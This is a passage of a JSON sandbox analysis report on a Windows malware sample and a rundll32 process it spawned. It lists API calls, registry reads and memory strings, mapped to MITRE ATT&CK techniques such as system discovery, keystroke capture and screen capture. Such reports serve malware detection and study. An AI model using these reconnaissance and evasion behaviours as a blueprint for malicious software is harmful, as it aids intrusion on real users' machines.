1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000050011c000000000000000000f8771f0040051f00010112002f0000000000000096000001000000007801000001000101d0e3120000000000a0e5120095e1ac77700a0700feffffffe063b0771664b07700000000f8771f00ac00000004e5120000000000f0771f00e4e412005c55b07700001c0000000000f8771f00f4e412003c5eaf778dc5aa75ac00000008e5120010e512000800000004000000f8e5120000000000080000000700000000000000ac000000f8e5120064e5120044a3b07603000000ac000000f8e5120000000000000000000c0000000000000001000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b07700000000000000000000000020b01e00c075dc7520b01e0000000000c075dc75b8fa120079dad475c075dc750200000010fb120072dcd4750000000079dcd475f21db4d485fc12006cfb1200ffffffff00000000000000000000000000000000c71501770000000020b01e001a000000c8fa12000000000078fd1200c2a2da75623a72a1feffffff79dcd4755edbd4752c0000003cdf4000000000003f000f005cfb120000000000aedbaf76cf444000020000803cdf40006cfb1200d04340007cdf40006cfb120078fd120058a6400000000000ee684000a8e3400009000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c000000000000000000f8771f0040051f00010112002f0000000000000096000001000000007801000001000101f4e4120000000000c4e6120095e1ac77700a0700feffffffe063b0771664b07700000000f8771f00a800000028e6120000000000f0771f0008e612005c55b07700001c0000000000f8771f0018e612003c5eaf778dc5aa75a80000002ce6120034e6120008000000040000001ce7120000000000080000000700000000000000a80000001ce7120088e6120044a3b07603000000a80000001ce7120000000000000000000c000000000000000100000000000000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00a07e1f009b7e1f00000000000000000000001c000000000134dc12000000000098e9120095e1ac77500a0700feffffff435cb0775059b077aa000000b80000009a7e1f00987e1f00bcdd1200f4e112000000000000000000000000000000000000000000000000002009000000001c001c5caf7760d8aa75ffffffff170000006cdd120024000000030000005ce2120088e71200f4e112008600000098dd120096edb077c27e1f00a06a867586000000bcdd1200f4e112000000000086008800a06a8675bcdd1200916c8675c27e1f00a06a8675a06a86752ce2120002020000 (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005736)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf21200000000003c0000002cf31200feffffffb4f21200cf00b177d600b177e6d2a5773c0000001e0000002cf312000000000088f2120000000000f0f21200 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f0070aa34002000000028f012003c000e000600000004f012001c56b07770aa340018aa34000100000068aa3400e8ef12000029b077bcf0120030f012000000000068aa3400fcef12005c55b07700002f000000000070aa34000cf012006755b0770000000080f012004bded4750000000053ded475851993dd00000000000000001cf312000800090040198d770000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000a577340000c020f2120000f3120044f1120000000000e0f1120095e1ac7722380700feffffffec38b0773dd1d4756dd1d475f51893dd1c178d77000000000000000020000000f8f1120020f212000000000000002f00909f3400909f3400180000000c00c000af030000180000008801000020f21200b0993400060000000cf212000000000000000000000000006cf21200000000006cf21200148ed375000000001c8ed375691b93dd0000000001000000c00135000200000058f21200000000000000000079dcd4755d1b93dd0000000001000000c00135000000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f0070aa34002000000028f012003c000e000a00000004f012001c56b07770aa340018aa34000100000068aa3400e8ef12000029b077bcf0120030f012000000000068aa3400fcef12005c55b07700002f000000000070aa34000cf012006755b0770000000080f012004bded4750000000053ded475851993dd01000000000000001cf312000800090040198d770000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f0070aa34002000000028f012003c000e001200000004f012001c56b07770aa340018aa34000100000068aa3400e8ef12000029b077bcf0120030f012000000000068aa3400fcef12005c55b07700002f000000000070aa34000cf012006755b0770000000080f012004bded4750000000053ded475851993dd03000000000000001cf312000800090040198d770000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f0070aa34002000000028f012003c000e001600000004f012001c56b07770aa340018aa34000100000068aa3400e8ef12000029b077bcf0120030f012000000000068aa3400fcef12005c55b07700002f000000000070aa34000cf012006755b0770000000080f012004bded4750000000053ded475851993dd04000000000000001cf312000800090040198d770000000000000000 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f0070aa34002000000028f012003c000e001e00000004f012001c56b07770aa340018aa34000100000068aa3400e8ef12000029b077bcf0120030f012000000000068aa3400fcef12005c55b07700002f000000000070aa34000cf012006755b0770000000080f012004bded4750000000053ded475851993dd07000000000000001cf312000800090040198d770000000000000000 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"IsWow64Process\" with parameter \"5736\" - (UID: 00000000-00005736)\n \"rundll32.exe\" called \"IsWow64Process\" with parameter \"5856\" - (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersionExA@KERNEL32.dll at 61726-100-00404650", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005736)\n \"rundll32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"rundll32.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "OpenProcess@KERNEL32.dll at 61726-99-004047D0\n OpenProcess@KERNEL32.dll at 61726-97-00404B90\n OpenProcess@KERNEL32.dll at 61726-105-00405070", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"base64\" (Indicator: \"base64\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n file/memory contains long string with (Indicator: \"base64\"; File: \"_.exe\")\n Found string \"base64\" (Indicator: \"base64\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found string \"moc.5432.hcraesgg\" (Indicator: \"aes\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"moc.hcraeserdracerocs\" (Indicator: \"aes\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"ten.mrofdaes.revres\" (Indicator: \"aes\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"ten.mrofdaes\" (Indicator: \"aes\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system\\*.* (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter avicap.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter avifile.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter COMMDLG.DLL (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter keyboard.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter lzexpand.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter mciavi.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter mciseq.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter mciwave.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter MMSYSTEM.DLL (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter mmtask.tsk (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter mouse.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter msvideo.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter olecli.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter OLESVR.DLL (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter rundll32.exe (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter SHELL.DLL (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter sound.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter stdole.tlb (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter system.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter TIMER.DRV (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter ver.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter vga.drv (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"FindNextFileW\" with parameter WFWNET.DRV (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetKeyState\" (Indicator: 